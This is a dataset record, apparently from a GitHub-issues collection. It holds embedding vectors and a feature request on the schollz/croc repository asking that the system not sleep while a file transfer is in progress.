0.017382409423589706, -0.0012774160131812096, -0.019181137904524803, -0.017525671049952507, -0.0023558575194329023, 0.007461542263627052, -0.020772933959960938, -0.017175475135445595, -0.0007575952331535518, 0.008078362792730331, 0.016602428629994392, -0.01978602074086666, 0.021250473335385323, -0.007107367739081383, -0.022619416937232018, 0.0014475391944870353, 0.00904139969497919, 0.0015629443805664778, 0.0010993338655680418, 0.0478493794798851, -0.003233334980905056, 0.0005252925911918283, 0.004791304934769869, 0.006773090455681086, -0.009765666909515858, -0.01193050853908062, -0.014302284456789494, 0.003911837935447693, -0.005825972184538841, 0.006494526285678148, 0.029209451749920845, -0.007696331944316626, 0.011094816029071808, -0.00790326576679945, 0.004437130410224199, 0.004409274086356163, -0.009701994247734547, 0.024258965626358986, 0.002077293349429965, -0.020104380324482918, -0.011699697934091091, -0.02777683548629284, -0.005841890349984169, 0.003911837935447693, 0.01093563623726368, 0.005308638792484999, -0.008396722376346588, 0.0004904720699414611, 0.007962957955896854, 0.026980936527252197, 0.0011809134157374501, 0.0111186932772398, 0.004656002391129732, 0.012742324732244015, 0.0070795114152133465, 0.01876727119088173, -0.015838367864489555, 0.019149301573634148, -0.011827042326331139, -0.012392129749059677, 0.018003208562731743, -0.010505851358175278, -0.018512584269046783, -0.008301214314997196, -0.0010107902344316244, -0.003885971149429679, -0.015384705737233162, 0.006279633846133947, 0.01588612049818039, -0.021521078422665596, 0.005380269605666399, -0.0019907394889742136, 0.0012863698648288846, 0.011309708468616009, -0.0033606786746531725, -0.018353404477238655, 0.0009550774120725691, -0.008547943085432053, 0.016347741708159447, -0.03508317843079567, -0.0045644743368029594, -0.00004184681529295631, 0.02577117271721363, -0.006399018689990044, 0.02231697551906109, 0.002753806533291936, 0.01060135941952467, 0.007724188733845949, 0.00967811793088913, -0.002067344728857279, 0.005662813317030668, -0.020709261298179626, 0.013665566220879555, 0.0035914890468120575, 0.02333572506904602, 0.004166525322943926, 0.002292185788974166, 0.0004128720029257238, -0.000010360662599850912, 0.006697480566799641, -0.016443248838186264, -0.005065889563411474, 0.01728690043091774, 0.012877627275884151, -0.0012077749706804752, 0.011317667551338673, 0.02960740029811859, 0.0024772321339696646, -0.00889813806861639, 0.009105071425437927, -0.010187492705881596, -0.01576673611998558, -0.012511514127254486, 0.00004710098437499255, 0.029129860922694206, 0.006757172755897045, 0.006387080065906048, 0.008412640541791916, -0.000025275974621763453, -0.002580698812380433, -0.007767962757498026, -0.0026085551362484694, 0.021218637004494667, 0.012567226774990559, 0.00701583968475461, -0.0022623396944254637, -0.0037228120490908623, -0.007131244521588087, -0.013681484386324883, 0.003541745478287339, -0.02193494513630867, -0.014533095061779022, -0.019181137904524803, 0.0313265398144722, -0.014724110253155231, 0.0159497931599617, -0.013968006707727909, 0.012694570235908031, 0.0027438579127192497, 0.017987290397286415, -0.0029109963215887547, -0.010649112984538078, -0.0014127186732366681, -0.003971530124545097, 0.011349502950906754, 0.0139202531427145, 0.013474550098180771, 0.008149993605911732, 0.015328992158174515, -0.019260728731751442, -0.006804926786571741, -0.00788336805999279, -0.017477916553616524, 0.0013609853340312839, 0.003907858394086361, -0.011850918643176556, 0.034223608672618866, 0.017079968005418777, 0.017414243891835213, -0.027092361822724342, 0.005619038827717304, -0.029050271958112717, 0.012033975683152676, 0.0013022877974435687, -0.004254073835909367, -0.002548862947151065, 0.004986300133168697, 0.009455266408622265, 0.016968542709946632, -0.007529193535447121, -0.007855511270463467, 0.018576255068182945, 0.014151063747704029, -0.0021807600278407335, -0.0003817822434939444, -0.005471797659993172, -0.014087392017245293, 0.0006645746761932969, -0.0037466890644282103, -0.00603688508272171, -0.0031835914123803377, 0.019021958112716675, 0.01041830237954855, 0.00428193062543869, -0.0156632699072361, -0.025277715176343918, -0.00592943886294961, -0.007708270568400621, -0.012033975683152676, 0.03228161484003067, -0.008317132480442524, 0.01840115897357464, 0.00963832251727581, -0.0016027393285185099, -0.013697401620447636, 0.017637096345424652, -0.019897446036338806, -0.00927221029996872, -0.01757342368364334, 0.017525671049952507, -0.017923619598150253, 0.009057317860424519, 0.022555744275450706, -0.012049892917275429, -0.006335346959531307, -0.007190937176346779, 0.00871508102864027, -0.014373915269970894, -0.00003640610884758644, -0.002515037078410387, 0.0024215192534029484, 0.010641153901815414, -0.003661130089312792, -0.009288127534091473, -0.01795545592904091, 0.0007501337095163763, -0.015368787571787834, -0.0004919643397442997, -0.000557625899091363, -0.011763369664549828, 0.014517176896333694, -0.011938467621803284, -0.000403171987272799, 0.0250389464199543, -0.0057384236715734005, -0.0019250778714194894, -0.004962422885000706, -0.010402385145425797, 0.012439883314073086, -0.0018146471120417118, 0.002097190823405981, -0.003002524608746171, 0.021441487595438957, -0.010442179627716541, 0.010895841754972935, 0.03124694898724556, -0.015058387070894241, -0.004699776880443096, 0.024609161540865898, 0.0008844414842315018, 0.006434834096580744, -0.027569901198148727, -0.022492073476314545, -0.020438656210899353, 0.03514684736728668, 0.012471719644963741, -0.0019549240823835135, -0.012702529318630695, -0.008476312272250652, -0.00698002427816391, -0.021234555169939995, 0.007437665481120348, -0.03086491860449314, -0.004604268819093704, 0.0043495818972587585, -0.0026881450321525335, 0.018496666103601456, 0.007326239719986916, -0.0001004199220915325, -0.0003730771131813526, 0.0058538285084068775, -0.011445011012256145, -0.031151441857218742, -0.0012833853252232075, 0.034319113940000534, 0.0214096512645483, -0.0015161853516474366, 0.006645746994763613, 0.003673068480566144, -0.0016912829596549273, -0.010187492705881596, 0.007306342013180256, -0.009152824990451336, -0.005758320912718773, -0.020295394584536552, 0.005885664373636246, -0.010068107396364212, 0.034892160445451736, -0.007354096043854952, 0.009431389160454273, 0.005881684832274914, 0.013490468263626099, -0.018592173233628273, 0.01706404983997345, 0.004715694580227137, 0.007226752582937479, 0.018050963059067726, 0.01422269456088543, 0.010720743797719479, 0.009733830578625202, -0.017844028770923615, -0.021154964342713356, -0.02118680067360401, 0.0009998466121032834, -0.008062445558607578, -0.008412640541791916, 0.0009446312324143946, 0.014501258730888367, 0.008388763293623924, 0.0012883596355095506, -0.021170882508158684, 0.0061124954372644424, 0.003519858233630657, 0.013554139994084835, 0.003008493920788169, 0.005913521163165569, -0.0036253146827220917, 0.00607270048931241, 0.0026642680168151855, -0.01676160842180252, -0.00325920176692307, 0.004528658930212259, -0.010688908398151398, -0.004389376379549503, 0.006267695687711239, 0.0013042775681242347, 0.00809428095817566, 0.021807601675391197, -0.03199509158730507, 0.005416085012257099, -0.0028851297684013844, -0.041259344667196274, -0.018783189356327057, -0.01712772250175476, -0.007576947566121817, -0.002310093492269516, 0.017159556970000267, -0.011031144298613071, -0.010020353831350803, -0.013824745081365108, -0.007354096043854952, 0.004962422885000706, 0.018926450982689857, 0.010824210941791534, 0.0015112110413610935, -0.01488329004496336, -0.026646660640835762, 0.00326716061681509, -0.020359067246317863, 0.014620643109083176, -0.004321725107729435, 0.00030791296740062535, 0.014891248196363449, -0.013737197034060955, -0.0015718982322141528, 0.008906097151339054, 0.016888951882719994, 0.0008590722572989762, -0.0021429548505693674, 0.00006087375004426576, -0.015305115841329098, 0.016299987211823463, -0.0014405751135200262, 0.012917421758174896, -0.00474355136975646, -0.01808279938995838, 0.010171574540436268, -0.02207820676267147, 0.017621178179979324, -0.001357005792669952, -0.00411877129226923, 0.0019977036863565445, -0.023685919120907784, 0.02526179701089859, -0.011031144298613071, -0.0046162074431777, -0.020406819880008698, -0.005105684511363506, -0.008555902168154716, -0.029973512515425682, -0.014588807709515095, 0.029591482132673264, 0.008245501667261124, -0.006948187947273254, -0.012622939422726631, -0.027299296110868454, 0.010147697292268276, 0.01244784239679575, 0.030689820647239685, 0.016276109963655472, -0.009351799264550209, 0.005209151189774275, -0.004831099882721901, -0.02260349877178669, -0.006892475299537182, 0.007839594036340714, -0.020279476419091225, 0.0025687601882964373, -0.00463610514998436, -0.004063058644533157, -0.025293633341789246, 0.019085630774497986, -0.0017947496380656958, 0.00507782818749547, -0.011866836808621883, 0.017541589215397835, 0.0038262789603322744, 0.011397257447242737, 0.01700037717819214, -0.01381678692996502, -0.006836762651801109, 0.005312618333846331, -0.00467192055657506, -0.001347057055681944, 0.0065741161815822124, 0.014612684026360512, -0.0010873954743146896, -0.021027620881795883, -0.005774239078164101, -0.015695106238126755, -0.01639549620449543, -0.02666257694363594, 0.0138486223295331, -0.0004519207577686757, -0.005619038827717304, -0.017844028770923615, -0.0009441337897442281, -0.005961274728178978, 0.011604190804064274, 0.006514423992484808, -0.0035696018021553755, 0.016244275495409966, 0.00871508102864027, 0.003273129928857088, -0.004823140799999237, -0.03256813809275627, -0.00010813018161570653, 0.00372878136113286, 0.004699776880443096, -0.005073848646134138, 0.009240373969078064, 0.014230653643608093, 0.009757707826793194, 0.026980936527252197, -0.011309708468616009, 0.024115703999996185, -0.020120296627283096, -0.0029149758629500866, -0.018512584269046783, 0.007071552332490683, 0.01957908645272255, 0.012129482813179493, -0.003975509665906429, 0.013172109611332417, -0.012169278226792812, 0.005829951725900173, 0.0021887191105633974, -0.0139202531427145, -0.0006048823706805706, -0.003247263142839074, -0.024768341332674026, -0.016379578039050102, 0.0026821757201105356, -0.001605723868124187, 0.025532402098178864, 0.012678653001785278, -0.014907166361808777, -0.017621178179979324, 0.0019191086757928133, 0.00285130413249135, 0.006769111379981041, -0.019897446036338806, 0.0008789696730673313, -0.005491694901138544, 0.0037685763090848923, -0.0058538285084068775, 0.02483201213181019, -0.0011202262248843908, 0.0272674597799778, -0.0001372923725284636, 0.007839594036340714, 0.005428023170679808, 0.005802095402032137, 0.010800333693623543, -0.013004970736801624, 0.0035337863955646753, 0.00037034120759926736, -0.010378507897257805, 0.0073341988027095795, -0.0045087612234056, 0.012718447484076023, 0.03390524908900261, -0.014986756257712841, -0.014708192087709904, 0.002548862947151065, -0.002111118985339999, 0.01941990666091442, 0.026996854692697525, 0.00023292447440326214, 0.0009804466972127557, -0.011508682742714882, 0.020518247038125992, 0.0006710413726978004, 0.011659903451800346, -0.00033154120319522917, -0.006267695687711239, 0.020152132958173752, -0.007990814745426178, 0.013474550098180771, 0.014978797174990177, -0.016164684668183327, -0.023526739329099655, -0.00004778496077051386, -0.016077136620879173, -0.005424043629318476, 0.0022006575018167496, 0.0009973595151677728, 0.009518938139081001, 0.004389376379549503, -0.011643985286355019, 0.01543245930224657, -0.004202340729534626, 0.00731430109590292, -0.009447307325899601, -0.007250629365444183, -0.004715694580227137, -0.007919183932244778, -0.00989301037043333, -0.010967472568154335, -0.016045300289988518, 0.0019479600014165044, -0.0044649867340922356, -0.0031358376145362854, 0.0032810887787491083, -0.016140807420015335, -0.013761073350906372, -0.004186422564089298, 0.00012746801075991243, 0.006936249788850546, 0.005308638792484999, -0.008524065837264061, -0.021473323926329613, -0.0014923084527254105, -0.0024314678739756346, -0.03037146106362343, -0.015902038663625717, 0.005288741085678339, -0.017032213509082794, 0.0026543193962424994, 0.0012545339995995164, -0.015520008280873299, -0.006291572470217943, 0.029750661924481392, -0.002566770650446415, 0.0015281238593161106, -0.009686077013611794, -0.01899012178182602, -0.004946505185216665, -0.007465521804988384, 0.004106832668185234, 0.0040948945097625256, 0.010474015958607197, -0.010187492705881596, -0.000015132940461626276, -0.016713853925466537, -0.01126991305500269, -0.01631590537726879, -0.0006561182672157884, 0.02725154161453247, 0.019165219739079475, -0.017907701432704926, -0.00607270048931241, -0.0014853443717584014, -0.005905562080442905, -0.0007725183386355639, -0.004632125608623028, -0.0004845028161071241, -0.023526739329099655, -0.008953850716352463, -0.01173949334770441, 0.003428329946473241, 0.006800947245210409, -0.019006039947271347, -0.007147162687033415, -0.024704668670892715, 0.011039103381335735, 0.011842959560453892, 0.020804770290851593, 0.00785153266042471, -0.03307751566171646, 0.025245878845453262, -0.013450673781335354, 0.01311639603227377, -0.014119227416813374, -0.009948723018169403, -0.01661834679543972, 0.0047714076936244965, -0.021154964342713356, -0.0055951620452106, 0.008707121945917606, -0.019977035000920296, -0.006836762651801109, 0.018289731815457344, -0.004831099882721901, -0.006808905862271786, 0.01491512544453144, -0.008476312272250652, 0.007067572791129351, -0.005463838577270508, 0.0017251085955649614, 0.021982697769999504, -0.006172187626361847, -0.003016452770680189, -0.014071473851799965, -0.004572432953864336, 0.013363124802708626, -0.017048131674528122, -0.029384547844529152, 0.006231880281120539, 0.00422621751204133, -0.02134598046541214, -0.025596074759960175, 0.031342457979917526, 0.03137429431080818, -0.018448911607265472, -0.004389376379549503, 0.005053951404988766, -0.015161854214966297, -0.007807757705450058, 0.01329945307224989, -0.0034024633932858706, 0.013601894490420818, 0.011819083243608475, 0.009503019973635674, 0.00605678278952837, -0.005368330981582403, 0.003478073514997959, 0.014612684026360512, 0.026423808187246323, 0.010895841754972935, 0.0019768113270401955, -0.007612762972712517, 0.01618856191635132, 0.004194381646811962, 0.02075701579451561, 0.007186957634985447, -0.008173870854079723, -0.02623279206454754, -0.02104353904724121, 0.022842267528176308, 0.007115326821804047, -0.015122058801352978, -0.0211231280118227, -0.012368252500891685, -0.016116932034492493, 0.001388841774314642, 0.000027514437533682212, -0.005304659251123667, -0.023892853409051895, 0.0011789236450567842, 0.012718447484076023, -0.0019917343743145466, 0.022062288597226143, -0.013999843038618565, -0.014692273922264576, 0.014270448125898838, 0.00031910528196021914, -0.0020335190929472446, 0.00028179757646285, -0.002463303739205003, 0.006999921519309282, 0.0007914209272712469, -0.019961118698120117, 0.013609853573143482, -0.020438656210899353, 0.006255757063627243, 0.009789543226361275, -0.01787586510181427, 0.0017609240021556616, -0.0002171308733522892, -0.007855511270463467, 0.0068288035690784454, -0.00511364359408617, 0.018958287313580513, -0.003750668605789542, 0.019770102575421333, 0.015671228989958763, -0.008882219903171062, -0.007338178344070911, -0.0044689662754535675, -0.007425726857036352, -0.007648578379303217, 0.0040531097911298275, -0.01743016205728054, -0.008985687047243118, 0.003486032597720623, 0.009113030508160591, -0.0138486223295331, -0.011110734194517136, -0.009471184574067593, -0.022635335102677345, -0.003700925037264824, -0.003488022368401289, -0.0046162074431777, -0.012630898505449295, 0.022253302857279778, 0.006629828829318285, -0.005038033239543438, -0.017382409423589706, -0.009120989590883255, -0.01403167936950922, 0.0004917156184092164, -0.007119306363165379, -0.0008794671157374978, 0.00864345021545887, -0.01048197504132986, 0.023988360539078712, -0.025500567629933357, 0.00027110270457342267, 0.020518247038125992, -0.02023172378540039, -0.041036494076251984, -0.01329945307224989, 0.0003867566119879484, 0.008508147671818733, -0.0018076830310747027, -0.00033775914926081896, 0.005451900418847799, -0.0038998995441943407, -0.01692078821361065, -0.013020888902246952, 0.023685919120907784, 0.0044729458168148994, 0.016825281083583832, 0.008157952688634396, -0.007481439504772425, -0.03259997442364693, -0.010099943727254868, -0.00371087365783751, -0.007039716467261314, 0.0016882983036339283, 0.014286366291344166, 0.008142034523189068, 0.007676434703171253, -0.00868324562907219, -0.012790078297257423, -0.000004671236183639849, -0.014063514769077301, 0.0013082571094855666, 0.006848700810223818, 0.0073341988027095795, 0.00596525426954031, 0.008866301737725735, -0.02554832026362419, 0.012463760562241077, 0.00783163495361805, -0.0076605165377259254, -0.0014614673564210534, 0.008229583501815796, -0.0050221155397593975, -0.00963832251727581, 0.005794136319309473, -0.009144865907728672, 0.005794136319309473, 0.0006615900783799589, -0.006418915931135416, 0.01086400542408228, -0.026169121265411377, 0.024625079706311226, 0.013665566220879555, -0.0056309774518013, 0.01292538084089756, -0.003653171006590128, -0.024258965626358986, 0.012503555044531822, 0.02296961098909378, -0.01226478535681963, 0.007039716467261314, 0.005909541621804237, 0.010688908398151398, -0.014931043609976768, 0.00015694111061748117, 0.026837674900889397, 0.006697480566799641, -0.001150072435848415, 0.0001416449376847595, 0.009144865907728672, 0.01728690043091774, 0.001614677719771862, -0.011850918643176556, -0.020948031917214394, -0.00034397709532640874, 0.0010207389714196324, 0.0015032520750537515, -0.012360293418169022, -0.012774160131812096, -0.020804770290851593, 0.0006471644155681133, -0.01816238835453987, -0.006116474978625774, 0.0014763905201107264, -0.0047196741215884686, 0.004381417762488127, 0.013339247554540634, -0.010068107396364212, -0.015018592588603497, -0.006180146709084511, -0.024545488879084587, 0.0047196741215884686, 0.007318280637264252, -0.005081807728856802, 0.005587202962487936, -0.01949949748814106, -0.029352713376283646, -0.0019240829860791564, -0.0045604947954416275, 0.015758777037262917, -0.005519551690667868, -0.0023976422380656004, -0.00038650789065286517, -0.01562347449362278, -0.007525213994085789, -0.006789008621126413, 0.021250473335385323, -0.0057344441302120686, -0.016602428629994392, 0.01178724691271782, 0.004739571828395128, 0.009248333051800728, 0.011564395390450954, -0.00745756272226572, -0.008253460749983788, 0.025659745559096336, 0.0007451593410223722, -0.0030502784065902233, -0.004317745566368103, 0.0033368016593158245, -0.0033228734973818064, -0.020550081506371498, -0.01333128847181797, 0.006705439183861017, -0.0009834312368184328, -0.01765301451086998, -0.0010346672497689724, -0.008114178664982319, 0.02000887133181095, -0.024847930297255516, 0.002536924323067069, -0.0009834312368184328, -0.009471184574067593, 0.037120673805475235, 0.005256905220448971, 0.02163250371813774, -0.014875330962240696, 0.0027617656160146, 0.01758934184908867, 0.02059783600270748, -0.002566770650446415, 0.010306877084076405, 0.016809362918138504, 0.007027777843177319, -0.005698628723621368, -0.014206776395440102, 0.001863395795226097, 0.005153438542038202, 0.030260035768151283, 0.009009563364088535, -0.005332515574991703, 0.007167059928178787, 0.004106832668185234, -0.002560801338404417, 0.0013619802193716168, 0.0033507298212498426, 0.01303680706769228, 0.00850018858909607, 0.008130096830427647, 0.029432302340865135, 0.0037964326329529285, 0.008842425420880318, -0.004023263696581125, -0.017477916553616524, 0.002083262661471963, -0.01278211921453476, 0.002986606676131487, -0.015464294701814651, -0.017318736761808395, 0.010354630649089813, 0.01166786253452301, 0.016809362918138504, -0.020343149080872536, 0.014588807709515095, -0.002795591251924634, 0.001835539354942739, 0.0071988957934081554, -0.0015420520212501287, -0.006856659892946482, 0.02725154161453247, 0.009136906825006008, 0.0018882675794884562, -0.010275040753185749, -0.019913364201784134, 0.004624166525900364, 0.004369479138404131, -0.015957752242684364, -0.025452813133597374, -0.01676160842180252, 0.007007880602031946, -0.011468888260424137, 0.007354096043854952, -0.0008466363069601357, -0.008555902168154716, 0.009152824990451336, -0.005057930946350098, -0.0040371916256845, 0.000015894638636382297, 0.001170964678749442, 0.018496666103601456, -0.010649112984538078, 0.024481818079948425, 0.016634264960885048, -0.016116932034492493, 0.019754184409976006, 0.008874260820448399, 0.021552912890911102, -0.024258965626358986, -0.017748521640896797, -0.005475777201354504, 0.010919718071818352, -0.011532559990882874, -0.0279837679117918, -0.009646281599998474, -0.01052972860634327, -0.0040988740511238575, 0.003752658376470208, 0.01310843788087368, 0.014166981913149357, 0.004166525322943926, -0.013864540494978428, 0.0225239098072052, -0.00744164502248168, 0.005591182503849268, 0.0035138889215886593, -0.00838080421090126, -0.004126730374991894, -0.002115098526701331, 0.019754184409976006, 0.004389376379549503, -0.0007297388510778546, 0.014302284456789494, 0.00557526433840394, -0.008062445558607578, 0.002067344728857279, -0.00816591177135706, -0.01771668531000614, -0.007692352868616581, 0.025882598012685776, -0.021759847179055214, -0.02378142811357975, 0.006956147029995918, 0.019515415653586388, -0.0013390980893746018, 0.0015122059267014265, -0.017079968005418777, 0.012081729248166084, -0.007055634167045355, -0.0005257900338619947, 0.005404146388173103, -0.00021489241044037044, -0.014596766792237759, -0.019006039947271347, -0.005909541621804237, 0.001831559929996729, 0.011429092846810818, 0.006311469711363316, 0.0015569751849398017, 0.01178724691271782, 0.011532559990882874, 0.0027617656160146, -0.028493143618106842, 0.024354474619030952, 0.01396004855632782, -0.0046878382563591, -0.016204480081796646, -0.011779287829995155, -0.002737888600677252, -0.008882219903171062, 0.012352334335446358, 0.0061522903852164745, 0.037916574627161026, 0.0035317966248840094, -0.02615320309996605, 0.005933418404310942, 0.016491003334522247, -0.006578095722943544, 0.02303328365087509, 0.01548021286725998, 0.002367796143516898, 0.012209072709083557, 0.02362224832177162, 0.03205876424908638, -0.008173870854079723, -0.014350038021802902, 0.00422621751204133, 0.007644598837941885, 0.00978158414363861, 0.03511501103639603, -0.007636639755219221, 0.015440418384969234, 0.017557505518198013, -0.007644598837941885, 0.003497970988973975, 0.013227822259068489, -0.000003831813046417665, 0.0010605339193716645, -0.006263716146349907, -0.005654854234308004, 0.020295394584536552, -0.012026016600430012, 0.011620108969509602, 0.0026045755948871374, 0.009152824990451336, -0.0033089453354477882, -0.012344375252723694, -0.006211982574313879, -0.008770794607698917, 0.016148766502738, 0.004624166525900364, 0.0036133762914687395, -0.01299701165407896, -0.022253302857279778, -0.008126117289066315, 0.02312879078090191, -0.008802630007266998, -0.0024115703999996185, 0.005682710558176041, 0.00955873355269432, 0.020772933959960938, -0.02408386953175068, 0.017812194302678108, -0.0023817243054509163, -0.010203409940004349, -0.00005580611832556315, -0.011333585716784, -0.0030841040425002575, 0.01677752658724785, 0.011898673139512539, 0.007190937176346779, -0.013745156116783619, -0.0009018517448566854, 0.015185730531811714, -0.0031199194490909576, 0.0009356773807667196, -0.012033975683152676, -0.01588612049818039, -0.0017499803798273206, 0.0010326774790883064, 0.009081194177269936, -0.01568714715540409, 0.018735434859991074, -0.0019857650622725487, 0.002803550101816654, -0.015599598176777363, -0.002958750119432807, -0.009988517500460148, 0.01927664503455162, -0.016729772090911865, 0.006697480566799641, -0.020852522924542427, 0.019977035000920296, 0.011110734194517136, 0.011198282241821289, -0.009312004782259464, -0.0030721656512469053, 0.009367717429995537, 0.00920057948678732, -0.0043495818972587585, 0.00963832251727581, 0.005045992322266102, 0.003505930071696639, 0.005766279995441437, -0.024258965626358986, 0.028397634625434875, 0.01749383471906185, 0.0005740413325838745, 0.009144865907728672, 0.0044729458168148994, -0.007413788232952356, -0.01712772250175476, 0.013020888902246952, 0.0077958195470273495, -0.018066881224513054, 0.0009854210074990988, 0.008130096830427647, -0.003989438060671091, -0.0031059912871569395, -0.0049345665611326694, 0.01152460090816021, -0.002039488172158599, 0.01214540097862482, -0.012169278226792812, -0.0038262789603322744, -0.010760539211332798, -0.011540519073605537, 0.010800333693623543, -0.003428329946473241, 0.011373380199074745, -0.002580698812380433, -0.011835000477731228, 0.0008227594080381095, -0.015114099718630314, 0.03817126154899597, 0.036515794694423676, 0.00017447573191020638, 0.008834466338157654, 0.0139202531427145, -0.0020126267336308956, -0.0139918839558959, -0.012463760562241077, -0.0005844874540343881, -0.00777592184022069, 0.0002626462955959141, 0.005105684511363506, -0.008181829936802387, -0.023733673617243767, -0.023208381608128548, 0.009168743155896664, 0.007159101311117411, -0.02429080195724964, -0.0005292720743454993, 0.004791304934769869, -0.00513354130089283, 0.002481211442500353, 0.015981629490852356, 0.013267616741359234, 0.017032213509082794, 0.002045457484200597, -0.0038302582688629627, 0.013227822259068489, 0.016411414369940758, 0.004878853913396597, 0.007807757705450058, 0.008356926962733269, -0.010282999835908413, 0.005662813317030668, 0.03146979957818985, -0.003488022368401289, -0.004170504864305258, 0.002970688743516803, -0.028922928497195244, -0.0035815401934087276, -0.0010466056410223246, 0.02327205240726471, 0.032982006669044495, 0.012201113626360893, -0.007389911450445652, -0.005244966596364975, 0.0014803699450567365, 0.014381874352693558, -0.00023615780810359865, -0.02386101707816124, -0.00857181940227747, 0.00889813806861639, -0.017525671049952507, -0.006741254590451717, 0.009136906825006008, 0.06220737472176552, -0.007417767774313688, 0.007871429435908794, 0.019531333819031715, -0.008213665336370468, -0.0029289040248841047, -0.007218793500214815, 0.014166981913149357, -0.00186041125562042, -0.02349490486085415, -0.0017848009010776877, -0.0051892539486289024, 0.012622939422726631, -0.010752580128610134, -0.01474002841860056, 0.0018236009636893868, -0.0026841654907912016, -0.02039090357720852, -0.015631433576345444, -0.006414936389774084, 0.012463760562241077, 0.019658677279949188, 0.012790078297257423, 0.009057317860424519, -0.0016634265193715692, 0.01211356557905674, 0.00889813806861639, -0.006335346959531307, 0.002083262661471963, -0.010147697292268276, 0.03073757514357567, 0.0060607618652284145, 0.021298225969076157, 0.005447920877486467, 0.01411126833409071, 0.00849223043769598, -0.001626616227440536, 0.013466591946780682, -0.0024175397120416164, -0.015782654285430908, 0.008937932550907135, 0.0013450674014165998, -0.010474015958607197, -0.03492399677634239, -0.014652479439973831, 0.015973670408129692, -0.0001884039374999702, 0.02053416520357132, -0.003243283601477742, 0.013753114268183708, 0.014668397605419159, 0.01358597632497549, 0.007982855662703514, 0.007636639755219221, -0.004819161258637905, 0.005833931267261505, -0.006844721268862486, -0.005157418083399534, -0.028938844799995422, 0.0070357369258999825, 0.0015151904663071036, -0.008651409298181534, -0.018257897347211838, -0.0047236536629498005, -0.015225525945425034, 0.030562477186322212, 0.018560336902737617, 0.02039090357720852, -0.01548021286725998, 0.028413552790880203, 0.011460929177701473, -0.005507613066583872, -0.03447829559445381, -0.0022583601530641317, -0.01141317468136549, -0.03259997442364693, 0.007099408656358719, -0.01443758700042963, -0.0026642680168151855, 0.0035596531815826893, -0.00029647196060977876, -0.0036312839947640896, -0.007891327142715454, -0.009057317860424519, -0.018576255068182945, -0.0033387914299964905, -0.015400622971355915, -0.017700767144560814, -0.019738266244530678, -0.01340291928499937, 0.02298552915453911, 0.014787781983613968, -0.004337643273174763, -0.008221624419093132, -0.004520699847489595, 0.0010883902432397008, -0.0090175224468112, 0.02260349877178669, 0.01247967779636383, 0.004297848325222731, 0.007640619296580553, 0.011365421116352081, -0.024800177663564682, 0.006578095722943544, 0.0012416006065905094, -0.003694955725222826, -0.0055951620452106, -0.019992953166365623, -0.010036271996796131, 0.015368787571787834, 0.007855511270463467, 0.011763369664549828, -0.005722505506128073, 0.016180602833628654, 0.019849691540002823, 0.01029891800135374, -0.0015639392659068108, 0.0022782576270401478, 0.011707657016813755, 0.0027219706680625677, -0.016825281083583832, 0.016729772090911865, 0.02777683548629284, -0.009916886687278748, 0.008579778485000134, 0.007843573577702045, 0.004206320270895958, 0.02037498541176319, 0.014668397605419159, 0.012543350458145142, 0.0036233249120414257, -0.01779627613723278, 0.030100855976343155, 0.02857273258268833, 0.010275040753185749, 0.00639105960726738, -0.009144865907728672, 0.03766188770532608, 0.0009570671827532351, 0.007947039790451527, 0.0026304423809051514, 0.036834150552749634, -0.0077958195470273495, -0.010426261462271214, -0.026933183893561363, 0.03345954418182373, 0.003430319717153907, 0.012049892917275429, -0.023670000955462456, -0.024052033200860023, 0.020645590499043465, 0.019961118698120117, 0.008516106754541397, 0.0004815181891899556, 0.0022464217618107796, 0.007951019331812859, 0.016411414369940758, 0.012917421758174896, 0.0002132757508661598, -0.005030074156820774, -0.007847553119063377, -0.01517777144908905, -0.0003643719828687608, -0.00659003434702754, -0.009288127534091473, 0.00511364359408617, 0.008205707184970379, 0.009765666909515858, 0.0014604725874960423, 0.01207377016544342, -0.012527432292699814, -0.0076605165377259254, -0.02134598046541214, -0.0019817855209112167, 0.019085630774497986, 0.007708270568400621, 0.012248868122696877, -0.0225239098072052, -0.023017365485429764, 0.0045127407647669315, -0.014445546083152294, 0.0015380725963041186, -0.01911746710538864, 0.030307790264487267, 0.016363659873604774, -0.018448911607265472, -0.01244784239679575, -0.018432993441820145, -0.007226752582937479, 0.005531489849090576, 0.023367561399936676, -0.012097647413611412, -0.0026065653655678034, -0.011898673139512539, -0.009956682100892067, 0.01162806712090969, 0.029384547844529152, 0.01311639603227377, 0.027824588119983673, -0.0031676734797656536, 0.0013709340710192919, -0.03151755407452583, 0.0019439804600551724, 0.011317667551338673 ]
null
null
null
null
null
null
null
null
null
[ "schollz", "croc" ]
**Is your feature request related to a problem? Please describe.** if the computer sleeps while transferring, it is stopped and also does not resume after waking up **Describe the solution you'd like** automatically prevent sleeping while transfer in progress **Describe alternatives you've considered** have to manually go to settings to disable sleeping every time which is annoying **Additional context** Add any other context or screenshots about the feature request here.
prevent sleeping while transferring
https://api.github.com/repos/schollz/croc/issues/690/comments
1
2024-04-05T20:34:16
2024-04-05T21:38:46Z
https://github.com/schollz/croc/issues/690
2,228,769,541
690
false
This is a GitHub Issue repo:croc owner:schollz Title : prevent sleeping while transferring Issue date: --- start body --- **Is your feature request related to a problem? Please describe.** if the computer sleeps while transferring, it is stopped and also does not resume after waking up **Describe the solution you'd like** automatically prevent sleeping while transfer in progress **Describe alternatives you've considered** have to manually go to settings to disable sleeping every time which is annoying **Additional context** Add any other context or screenshots about the feature request here. --- end body ---
632
[ -0.020195195451378822, 0.01044532097876072, -0.0056862905621528625, 0.021054275333881378, -0.0008301030029542744, 0.005345385987311602, 0.018027041107416153, 0.04712666943669319, -0.00576810771599412, 0.018163403496146202, 0.02888144738972187, 0.026263300329446793, -0.0012809494510293007, -0.019199753180146217, 0.012320296838879585, 0.005635154899209738, 0.009463515132665634, 0.02691783756017685, -0.00725445244461298, -0.012893016450107098, -0.01348619069904089, -0.010663500055670738, 0.0038181329146027565, 0.04565396159887314, 0.01686796545982361, 0.018231583759188652, -0.01020668726414442, 0.02708147093653679, -0.012695292010903358, -0.02054973691701889, -0.0062010567635297775, 0.015108897350728512, 0.015381621196866035, 0.013015742413699627, 0.036272261291742325, -0.01551798265427351, 0.025090588256716728, -0.007452177349478006, -0.03643589839339256, 0.007847626693546772, -0.02710874378681183, -0.030299611389636993, -0.03709043189883232, -0.009824873879551888, -0.03539954498410225, 0.01682705618441105, -0.058635611087083817, 0.03902677074074745, 0.004707894288003445, -0.005386294797062874, 0.04107220098376274, -0.05596292018890381, -0.03959949314594269, -0.0331086665391922, -0.013118013739585876, -0.015831615775823593, 0.056726545095443726, -0.02896326594054699, -0.019677020609378815, 0.0031670047901570797, -0.022226987406611443, 0.058962881565093994, -0.026004211977124214, 0.019595203921198845, 0.009040793403983116, -0.009920326992869377, -0.02266334556043148, 0.024217871949076653, 